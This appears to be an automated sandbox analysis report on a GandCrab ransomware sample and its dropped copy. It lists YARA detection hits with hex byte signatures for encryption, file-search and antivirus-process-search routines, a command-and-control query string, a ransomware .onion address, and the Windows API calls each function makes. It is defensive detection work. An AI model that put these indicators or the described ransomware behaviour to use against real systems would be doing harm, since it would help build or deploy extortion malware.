28.3.wzltxa.exe.38a0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
28.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
28.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
28.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
28.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
39.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
39.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
39.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
39.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
12.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
12.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
31.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
31.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
31.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
31.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
31.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
31.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
31.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
Click to see the 355 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: mPNVrHIpyt.exe	Virustotal: Detection: 84%	Perma Link
Source: mPNVrHIpyt.exe	Metadefender: Detection: 78%	Perma Link
Source: mPNVrHIpyt.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Source: mPNVrHIpyt.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Machine Learning detection for sample

Source: mPNVrHIpyt.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Joe Sandbox ML: detected

Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 27.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 20.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.3.wzltxa.exe.3940000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.3.wzltxa.exe.2fa0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 20.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 31.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 40.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.3.wzltxa.exe.3270000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 39.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 33.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 39.3.wzltxa.exe.4010000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 31.3.wzltxa.exe.3b90000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.3.wzltxa.exe.3b20000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 39.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.3.wzltxa.exe.3a80000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 33.3.wzltxa.exe.2f00000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.3.wzltxa.exe.3640000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 33.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 31.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 28.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 28.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 28.3.wzltxa.exe.38a0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 30.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 40.0.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.3.wzltxa.exe.3a00000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 22.2.wzltxa.exe.fbb0000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F695860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	0_2_0F695860
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F694B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	0_2_0F694B20
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F698400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F698400
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F6963E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	0_2_0F6963E0
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F6982B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F6982B0
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F696660
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F695670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	0_2_0F695670
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F6934F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	0_2_0F6934F0
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F6953D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	0_2_0F6953D0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB82B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	11_2_0FBB82B0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB63E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	11_2_0FBB63E0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB4B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	11_2_0FBB4B20
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB5860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	11_2_0FBB5860
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB34F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	11_2_0FBB34F0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB53D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	11_2_0FBB53D0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB8400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	11_2_0FBB8400
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB5670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	11_2_0FBB5670
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	11_2_0FBB6660
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB82B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	12_2_0FBB82B0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB63E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	12_2_0FBB63E0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB4B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	12_2_0FBB4B20
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB5860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	12_2_0FBB5860
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB34F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	12_2_0FBB34F0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB53D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	12_2_0FBB53D0
